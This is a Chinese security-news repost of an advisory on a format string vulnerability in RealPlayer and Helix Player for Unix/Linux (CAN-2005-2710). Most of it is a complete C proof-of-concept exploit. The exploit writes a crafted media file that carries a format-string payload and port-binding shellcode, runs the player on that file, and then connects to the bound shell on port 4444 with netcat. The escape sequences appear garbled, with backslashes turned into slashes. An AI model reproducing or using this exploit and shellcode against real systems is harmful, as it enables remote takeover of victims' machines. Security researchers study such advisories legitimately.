 |
RealPlayer和Helix Player格式串处理漏洞 |
|
|
| RealPlayer和Helix Player格式串处理漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 11:24:39 |
|
受影响系统:
Real Networks RealPlayer 10 Japanese
Real Networks RealPlayer 10 German
Real Networks RealPlayer 10 for Linux
Real Networks RealPlayer 10 English
Real Networks Helix Player for Linux 1.0.4
Real Networks Helix Player for Linux 1.0.3
Real Networks Helix Player for Linux 1.0.2
Real Networks Helix Player for Linux 1.0.1
Real Networks Helix Player for Linux 1.0
Real Networks RealPlayer For Unix 10.0.4
Real Networks RealPlayer For Unix 10.0.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 14945
CVE(CAN) ID: CAN-2005-2710
RealPlayer和Helix Player都是非常流行的媒体播放器,支持多种媒体格式。
RealPlayer和Helix Player中存在格式串漏洞,远程攻击者可能利用此漏洞控制机器。
起因是没有正确的验证用户输入。远程攻击者可以利用这个漏洞直接向格式化打印函数提供格式说明符,导致执行任意代码。
<*来源:c0ntex (c0ntex@hushmail.com)
链接:http://lwn.net/Alerts/153346/?format=printable
http://lwn.net/Alerts/153347/?format=printable
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFER 10000
#define EBPMSB 64105
#define HOST "localhost"
#define NETCAT "/bin/nc"
#define NOPS 0x90
#define STACKPOP 148
#define VULN "/usr/local/RealPlayer/realplay"
char filename[]="/x56/x59/x14/x82/x26/x08/x2e/x72/x70";
/* metasploit port binding shellcode = 4444 */
char hellcode[]="/x31/xdb/x53/x43/x53/x6a/x02/x6a/x66"
"/x58/x99/x89/xe1/xcd/x80/x96/x43/x52"
"/x66/x68/x11/x5c/x66/x53/x89/xe1/x6a"
"/x66/x58/x50/x51/x56/x89/xe1/xcd/x80"
"/xb0/x66/xd1/xe3/xcd/x80/x52/x52/x56"
"/x43/x89/xe1/xb0/x66/xcd/x80/x93/x6a"
"/x02/x59/xb0/x3f/xcd/x80/x49/x79/xf9"
"/xb0/x0b/x52/x68/x2f/x2f/x73/x68/x68"
"/x2f/x62/x69/x6e/x89/xe3/x52/x53/x89"
"/xe1/xcd/x80";
int
filegen(char *shellcode)
{
FILE *rp;
printf("[-] Creating file [%s]/n", filename);
rp = fopen(filename, "w");
if(!rp) {
puts("[!] Could not fopen file!");
free(shellcode);
return(EXIT_FAILURE);
}
printf("[-] Using [%d] stack pops/n[-] Modifying EBP MSB with value [%d]/n", STACKPOP, EBPMSB);
fprintf(rp,
"<imfl>/n"
"<head/n"
"duration=/"1:33.7/"/n"
"timeformat=/"dd:hh:mm:ss.xyz/"/n"
"preroll=/"1:33.7/"/n"
"bitrate=/"1337/"/n"
"width=/"69/"/n"
"height=/"69/"/n"
"aspect=/"/"/n"
"url=/"http://www.open-security.org/"/>/n"
"<image handle=/"%%.%du%%%d$hn/" name=/"findme%s/"/>/n"
"<fadein start=/"0/" duration=/"0:01/" target=/"2/"/>/n"
"</imfl>", EBPMSB, STACKPOP, shellcode);
fclose(rp);
free(shellcode); shellcode = NULL;
return(EXIT_SUCCESS);
}
int
main(int argc, char **argv)
{
char *shellcode = NULL;
puts("/nRemote format string exploit POC for UNIX RealPlayer && HelixPlayer");
puts("Code tested on Debian 3.1 against RealPlayer 10 Gold’s latest version");
puts("by c0ntex || c0ntexb@gmail.com || http://www.open-security.org/n");
shellcode = (char *)malloc(BUFFER);
if(!shellcode) {
puts("[!] Could not malloc");
return(EXIT_FAILURE);
}
memset(shellcode, NOPS, BUFFER);
memcpy(&shellcode[BUFFER-strlen(hellcode)], hellcode, strlen(hellcode));
shellcode[BUFFER] = ’/0’;
filegen(shellcode);
puts("[-] Completed creation of test file!/n[-] Executing RealPlayer now...");
switch(fork()) {
case -1:
puts("[!] Could not fork off, bailing!");
return(EXIT_FAILURE);
case 0:
if(execl(VULN, "realplay", filename, NULL) <0) {
puts("[!] Could not execute realplayer... :(");
return(EXIT_FAILURE);
}
}
puts("[-] Connecting to shell in 10 seconds/n** YOU MIGHT HAVE TO HIT RETURN ON REALPLAYER WINDOW **");
sleep(10);
if(execl(NETCAT, "nc", HOST, "4444", NULL) <0) {
puts("[!] Could not connect, check the core file!");
return(EXIT_FAILURE);
}
return(EXIT_SUCCESS);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.real.com【转自世纪安全网 http://www.21safe.com】
|
|
| 新闻录入:admin 责任编辑:admin |
|
|
上一篇新闻: nb文章系统 2.0RC1 Fck_editor漏洞
下一篇新闻: Novell GroupWise客户端本地整数溢出漏洞 |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
